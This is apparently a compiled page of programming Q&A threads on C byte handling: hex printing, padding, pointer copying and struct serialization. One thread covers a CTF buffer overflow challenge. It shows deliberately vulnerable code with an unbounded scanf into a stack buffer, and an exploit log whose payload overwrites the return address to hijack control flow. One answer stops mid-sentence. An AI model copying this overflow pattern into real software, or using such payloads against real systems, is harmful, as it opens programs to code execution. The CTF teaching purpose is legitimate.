I want to do padding with PKCS7 :
char *test1 = "azertyuiopqsdfgh";
char *test2 = malloc(32*sizeof(char));
memcpy(test2, test1, strlen(test1));
char pad = (char)(32-strlen(test1));
printf("pad = %d\n", pad);
for(int i = strlen(test1) ; i < 32 ; i++) {
test2[i] = pad;
}
for (int i = 0 ; i < 32 ; i++)
printf("%x ", test2[i]);
printf("\n");
I obtain :
pad = 16
61 7a 65 72 74 79 75 69 6f 70 71 73 64 66 67 68 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10
But i want :
pad = 16
61 7a 65 72 74 79 75 69 6f 70 71 73 64 66 67 68 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16
How can i modify my code ?
Thanks in advance.
With
printf("%x ", test2[i]);
You are printing in hexadecimal (%x) whereas with
printf("pad = %d\n", pad);` you are printing in decimal (%d).
And (decimal) 16 => (hexa) 10, So you are displaying the right thing.
You could probably play a bit with your printing to display 16 instead of 10 but I don't think this is what you are searching for.
Related
This question already has answers here:
Printing hexadecimal characters in C
(7 answers)
Closed 5 months ago.
I have following function:
void hexDump(char *buf, size_t size) {
for(int i = 0; i < size; i++) {
if(i % 4 == 0) {
printf("\n");
}
printf("%02x ", buf[i]);
}
The first two lines always output fine, but the next lines break:
24 00 00 00
00 0a 04 04
ffffffe8 ffffffd9 22 63
00 00 00 00
02 00 0a 00
...
Real content of buf obtained by gdb:
0x7fffffffd320: 0x24 0x00 0x00 0x00 0x00 0x0a 0x04 0x04
0x7fffffffd328: 0xe8 0xd9 0x22 0x63 0x00 0x00 0x00 0x00
0x7fffffffd330: 0x02 0x00 0x0a 0x00 0x00 0x00 0x00 0x00
How can I fix it?
Four things leads to this problem:
It's implementation-defined if char is signed or unsigned.
Default argument promotion leads to char values being promoted to int.
When signed integer values are promoted, it's sign-extended to keep negative values negative.
Negative values are usually stored using two's complement, which sets the top bit.
All this leads to a value like 0xf0 could be considered negative, and will be promoted to 0xfffffff0 as an int.
To print only the byte use the hh prefix:
printf("%02hhx ", buf[i]);
Or make sure that the data is unsigned:
void hexDump(unsigned char *buf, size_t size) { ... }
Alternatively, instead if unsigned char use uint8_t.
Here are 3 fixups
void hexDump( unsigned char *buf, size_t size ) {
for( size_t i = 0; i < size; i++ )
printf( "%02x%c", buf[ i ], " \n"[ i % 4 ] );
}
1 - buf should be treated like hex. Hexadecimal is unsigned
2 - size_t i Don't compare an int to a size_t type
3 - indexing into a 4 byte string (3 x SP and 1 x LF) eliminates the if()
You could even go on to add the snazzy address column on the left:
#include <stdio.h>
#include <string.h>
void hexDump( unsigned char *buf, size_t size ) {
for( size_t i = 0; i < size; i++ ) {
if( i % 4 == 0 )
printf( "%04X ", i );
printf( "%02x%c", buf[ i ], " \n"[ i % 4 ] );
}
}
int main() {
char *str = "The quick brown fox jumps over the lazy dogs";
hexDump( (unsigned char*) str, strlen( str ) + 1 );
return 0;
}
Output
0000 54 68 65 20
0004 71 75 69 63
0008 6b 20 62 72
000C 6f 77 6e 20
0010 66 6f 78 20
0014 6a 75 6d 70
0018 73 20 6f 76
001C 65 72 20 74
0020 68 65 20 6c
0024 61 7a 79 20
0028 64 6f 67 73
002C 00
Or, the ACTUAL memory address with 8 / line. (Notice now 7xSP + 1xLF)
void hexDump( unsigned char *buf, size_t size ) {
for( size_t i = 0; i < size; i++ ) {
if( i % 8 == 0 )
printf( "%p ", buf + i );
printf( "%02x%c", buf[ i ], " \n"[ i % 8 ] );
}
}
/* Output */
00422B10 54 68 65 20 71 75 69 63
00422B18 6b 20 62 72 6f 77 6e 20
00422B20 66 6f 78 20 6a 75 6d 70
00422B28 73 20 6f 76 65 72 20 74
00422B30 68 65 20 6c 61 7a 79 20
00422B38 64 6f 67 73 00
I am creating a simple CTF in buffer overflow below is the sample code:
#include <stdio.h>
void secretFunction()
{
printf("this is your flag!\n");
}
void echo()
{
char buffer[20];
printf("Enter some text:\n");
printf("%s", buffer);
printf("You entered: %s\n", buffer);
}
int main()
{
echo();
return 0;
}
Compile: gcc vuln.c -o vuln -fno-stack-protector -m32
But if we do strings vuln its displays the actual flag directly is there any way where my secretFunction is not visible when users to strings on the binary.
In my opinion, encrypting the string with xor should be the easiest way to avoid leaking strings.
#include <stdio.h>
void secretFunction()
{
//printf("this is your flag!\n");
unsigned char str[] = {184, 164, 165, 191, 236, 165, 191, 236, 181, 163, 185, 190, 236, 170, 160, 173, 171, 237, 198, 0};
for (int i = 0; i < 19; i++)
putchar(str[i] ^ 0xcc);
}
void echo()
{
char buffer[20];
printf("Enter some text:\n");
scanf("%s", buffer);
printf("You entered: %s\n", buffer);
}
int main()
{
echo();
return 0;
}
hijack the control flow:
$ ./exp.py
[+] Starting local process './vuln' argv=[b'./vuln'] : pid 4658
[DEBUG] Received 0x11 bytes:
b'Enter some text:\n'
[DEBUG] Sent 0x25 bytes:
00000000 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 │AAAA│AAAA│AAAA│AAAA│
*
00000020 f6 91 04 08 0a │····│·│
00000025
[*] Switching to interactive mode
[DEBUG] Received 0x45 bytes:
00000000 59 6f 75 20 65 6e 74 65 72 65 64 3a 20 41 41 41 │You │ente│red:│ AAA│
00000010 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 │AAAA│AAAA│AAAA│AAAA│
00000020 41 41 41 41 41 41 41 41 41 41 41 41 41 f6 91 04 │AAAA│AAAA│AAAA│A···│
00000030 08 0a 74 68 69 73 20 69 73 20 79 6f 75 72 20 66 │··th│is i│s yo│ur f│
00000040 6c 61 67 21 0a │lag!│·│
00000045
You entered: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xf6\x9
this is your flag!
Generally, the solution is to distribute a binary which runs on a remote server, and replaces the actual key with a placeholder on the CTF-competitor's copy.
An easy way to do this is with environment variables, because the CTF
So my knowledge of pointers is a bit rusty and I think thats where I'm getting messed up, I am trying to write a function that will grab hex values (an amount n) at a specified offset in the file. And write those values to an array.
File I'm reading from, Example
0 1 2 3 4 5 6 7 8 9 A B C D E F
0 F6 EA 9D DE D8 40 1C 44 19 24 59 D2 6A 2C 48 1D
1 FC 96 DE 94 AF 95 FC 42 9B 6D DA 15 D4 CE 88 BB
2 B8 24 99 8F 65 B5 D3 7E D9 5D 51 44 89 97 61 85
3 2D 40 1A DC D5 16 1F 70 84 F9 85 58 C8 0E 13 80
4 32 AC 10 97 61 B3 16 3B 40 67 7A CA FE E1 4F 2B
5 21 A9 07 F6 80 26 66 04 20 EC 5C E8 FA 70 68 2C
6 1C 78 C4 7E 5C DA B9 9C 41 38 66 3F 19 B6 6A 3A
Here's the function I've written thus far.
aDest point's to an array of size nBytes + 1
bAddr point's to firstbyte of the memory region
OffsetAmt is a location which is relative bAddr
nBytes is just the number of bytes that I want to copy
Heres the function
void getHexBytesAt(uint8_t* const aDest, const uint8_t* const bAddr,
uint16_t OffsetAmt, uint8_t nBytes)
{
const uint8_t *point1 = bAddr; //set he address of point1 to base address value
//front point1 shift until we get to the specified offset value
for (int i = 0; i < Offset; i++)
{
point1 = (point1 + 1);
}
//set the values of *aDest to the value of point1;
//increment point1
for (int k = 0; k < nBytes; k++)
{
*aDest = point1;
point1 = (point1 + 1);
}
The problem I'm having is im not even getting the first byte copied into the array correctly,
My output looks like this Getting 9 bytes,
starting at the offset 2C
MY OUTPUT: 84 CA CA CA CA CA CA CA CA
FILE: 89 97 61 85 2D 40 1A DC D5
If you want to read the data from the Memory bAddr then you must
dereference the pointer for reading
increment the Destination pointer
This would be implemented like this:
void getHexBytesAt(uint8_t* const aDest, const uint8_t* const bAddr,
uint16_t OffsetAmt, uint8_t nBytes)
{
const uint8_t *point1 = bAddr; //set he address of point1 to base address value
//front point1 shift until we get to the specified offset value
for (int i = 0; i < OffsetAmt; i++) // fixed typo
{
point1 = (point1 + 1);
}
//set the values of *aDest to the value of point1;
//increment point1
for (int k = 0; k < nBytes; k++)
{
*aDest = *point1; // copy data from address the point1 points to
aDest = aDest + 1; // increment destination pointer
point1 = (point1 + 1);
}
}
But this can be done much simpler:
void getHexBytesAt(uint8_t* const aDest, const uint8_t* const bAddr,
uint16_t OffsetAmt, uint8_t nBytes)
{
memcpy(aDest, bAddr + OffsetAmt, nBytes);
}
You should consider replacing the function with the one-liner that implements it in your code.
BTW: There is no file used in the code. You should review your question.
I'm writing a program that encrypts based on bit/byte shifts. This program currently takes in a file, displays the contents, then displays the hex values.
To encrypt the file I am suppose to perform bit/byte shifts. However, I loaded the file into an array and performed shifts through the use of temp swaps. I'm pretty sure the outcome is the same, but I wanted to implement this with the proper bit shifts.
To produce the same results, do I just say load[x>>3] to shift the bits? I'm getting terrible results attempting to implement this.
Below is the entire block of code with a sample output at the end. Thanks in advance to everyone for your time.
#include <stdio.h>
#include <stdlib.h>
int main(int argc, char* argv[]) {
FILE *fp;
char ch;
char load[100];
int count1 = 0;
int count2 = 0;
int i = 0;
fp = fopen("load.txt", "r");
if (fp == NULL)
{
perror("Exiting, an error occured while opening\n");
exit(EXIT_FAILURE);
}
while((ch = fgetc(fp)) != EOF)
{
printf("%c", ch);
++count1;
}
fclose(fp);
fp = fopen("load.txt", "r");
if (fp == NULL)
{
perror("Exiting, an error occured while opening\n");
exit(EXIT_FAILURE);
}
printf("\n\n");
while((ch = fgetc(fp)) != EOF)
{
printf("%x ", ch);
++count2;
}
fclose(fp);
printf("\n\n");
printf("Count1: %d, Count2: %d \n", count1, count2);
printf("\n\n");
fp = fopen("load.txt", "r");
if (fp == NULL)
{
perror("Exiting, an error occured while opening\n");
exit(EXIT_FAILURE);
}
i = 0;
while((ch = fgetc(fp)) != EOF)
{
load[i++] = ch;
}
load[i] = 0;
fclose(fp);
// for(i = 0; i < 100; ++i)
// {
// printf("%s", load);
// }
printf("\n\n");
for(i = 0; i < 50; ++i)
{
printf("%x ", load[i]);
}
// printf("\n index i: %c\n", load[0]);
//shift bytes
char temp, temp2, temp3, temp4;
temp = load[7];
load[7] = load[11];
load[11] = temp;
temp2 = load[8];
load[8] = load[12];
load[12] = temp2;
temp3 = load[9];
load[9] = load[13];
load[13] = temp3;
temp4 = load[10];
load[10] = load[14];
load[14] = temp4;
printf("\n\n");
for(i = 0; i < 50; ++i)
{
printf("%x ", load[i]);
}
printf("\nAfter byte shift: \n %s", load);
//shift bites
temp = load[6];
load[6] = load[4];
load[4] = temp;
temp2 = load[5];
load[5] = load[3];
load[3] = temp2;
printf("\nAfter bit shift: \n %s", load);
printf("\n\n");
for(i = 0; i < 50; ++i)
{
printf("%x ", load[i]);
}
printf("\n\n");
return 0;
}
The quick brown fox jumped over the lazy dog.
54 68 65 20 71 75 69 63 6b 20 62 72 6f 77 6e 20 66 6f 78 20 6a 75 6d 70 65 64 20 6f 76 65 72 20 74 68 65 20 6c 61 7a 79 20 64 6f 67 2e a
Count1: 46, Count2: 46
54 68 65 20 71 75 69 63 6b 20 62 72 6f 77 6e 20 66 6f 78 20 6a 75 6d 70 65 64 20 6f 76 65 72 20 74 68 65 20 6c 61 7a 79 20 64 6f 67 2e a 0 0 0 0
54 68 65 20 71 75 69 72 6f 77 6e 63 6b 20 62 20 66 6f 78 20 6a 75 6d 70 65 64 20 6f 76 65 72 20 74 68 65 20 6c 61 7a 79 20 64 6f 67 2e a 0 0 0 0
After byte shift:
The quirownck b fox jumped over the lazy dog.
After bit shift:
Theui qrownck b fox jumped over the lazy dog.
54 68 65 75 69 20 71 72 6f 77 6e 63 6b 20 62 20 66 6f 78 20 6a 75 6d 70 65 64 20 6f 76 65 72 20 74 68 65 20 6c 61 7a 79 20 64 6f 67 2e a 0 0 0 0
I am developing a Client/Server based on UDP I want to send different messages to the client from the server. There are different C structures defined for each message.
I would like to understand what is wrong in the way I am serializing the data.
struct Task
{
int mType;
int tType;
int cCnt;
int* cId;
char data[128];
};
Serialization/Deserialization functions
unsigned char * serialize_int(unsigned char *buffer, int value)
{
buffer[0] = value >> 24;
buffer[1] = value >> 16;
buffer[2] = value >> 8;
buffer[3] = value;
return buffer + 4;
}
unsigned char * serialize_char(unsigned char *buffer, char value)
{
buffer[0] = value;
return buffer + 1;
}
int deserialize_int(unsigned char *buffer)
{
int value = 0;
value |= buffer[0] << 24;
value |= buffer[1] << 16;
value |= buffer[2] << 8;
value |= buffer[3];
return value;
}
char deserialize_char(unsigned char *buffer)
{
return buffer[0];
}
Sender side code to serialize the structure
unsigned char* serializeTask(unsigned char* msg, const Task* t)
{
msg = serialize_int(msg,t->mType);
msg = serialize_int(msg,t->tkType);
msg = serialize_int(msg,t->cCnt);
for(int i=0; i<t->cCnt; i++)
msg = serialize_int(msg,t->cId[i*4]);
for(int i=0; i<strlen(data); i++)
msg = serialize_char(msg,t->data[i]);
return msg;
}
Receiver side code to de-serialize data
printf("Msg type:%d\n", deserialize_int(message) );
printf("Task Type:%d\n", deserialize_int(message+4) );
printf("Task Count:%d\n", deserialize_int(message+8));
Output
Msg type:50364598 //Expected value is 3
Task Type:-2013036362 //Expected value is 1
Task Count:1745191094 //Expected value is 3
Question 1:
Why is the de-serialized value not same as expected?
Question 2:
How is serialization/de-serialization method different from memcpy?
Task t;
memcpy(&t, msg, sizeof(t)); //msg is unsigned char* holding the struct data
EDIT
Code which invokes serializeTask
void addToDatabase(unsigned char* message, int msgSize, Task* task)
{
message = new unsigned char[2*msgSize+1];
unsigned char* msg = message; //To preserve start address of message
message = serializeTask(message, task); //Now message points to end of the array
//Insert serialized data to DB
//msg is inserted to DB
}
Serialized data stored in DB
Message:
00
03 70 B6 88 03 70 B6 68 05 70 B6 68 05 70 B6 00
00 00 00 00 00 00 00 A8 05 70 B6 AC 05 70 B6 B4
05 70 B6 C9 05 70 B6 DE 05 70 B6 E6 05 70 B6 EE
05 70 B6 FB 05 70 B6 64 65 66 00 63 6F 68 6F 72
74 73 00 70 65 6E 64 69 6E 67 5F 61 73 73 69 67
6E 5F 74 61 73 6B 73 00 70 65 6E 64 69 6E 67 5F
61 73 73 69 67 6E 5F 74 61 73 6B 73 00 6D 65 73
73 61 67 65 00 6D 65 73 73 61 67 65 00 3F 00 FF
FF 00 00 FC 90 00 00 00 00 00 00 00 C9 2D B7 00
00 00 00 10 06 70 B6 00 00 00 00 00 00 00 00 30
06 70 B6 34 06 70 B6 3C 06 70 B6
OP has 2 problems in serializeTask()
for(int i=0; i<t->cCnt; i++)
msg = serialize_int(msg,t->cId[i*4]); [i*4]
...
for(int i=0; i<strlen(data); i++)
msg = serialize_char(msg,t->data[i]); strlen(data)
Should be (assuming i<strlen(data) should have been i<strlen(t->data)
for(int i=0; i<t->cCnt; i++)
msg = serialize_int(msg,t->cId[i]); // [i]
...
for(int i=0; i<strlen(t->data); i++) // strlen(data) + 1
msg = serialize_char(msg,t->data[i]);
The first for loop serialize every 4th cId[]. OP certainly wanted to serialize consecutive cId[].
Only the length of the data string was serialized. OP certainly wanted to serialize all that and a NUL terminating byte.
The data in the posted buffer is more likely the below, which does not match the serialization code. This implies the higher level code populating Task* t is wrong. I am confident that the values seen in fields mType and tkType are either pointers or float, again Task* t is likely amiss before the serialization.
0xb6700300 or -3.576453e-06
0xb6700388 or -3.576484e-06
0xb6700568 or -3.576593e-06
0xb6700568 or -3.576593e-06
0x000000 or 0.000000e+00
0x000000 or 0.000000e+00
0xb67005a8 or -3.576608e-06
0xb67005ac or -3.576609e-06
0xb67005b4 or -3.576611e-06
0xb67005c9 or -3.576615e-06
0xb67005de or -3.576620e-06
0xb67005e6 or -3.576622e-06
0xb67005ee or -3.576624e-06
0xb67005fb or -3.576627e-06
def\0cohorts\0pending_assign_tasks\0pending_assign_tasks\0message\0message\0?\0
...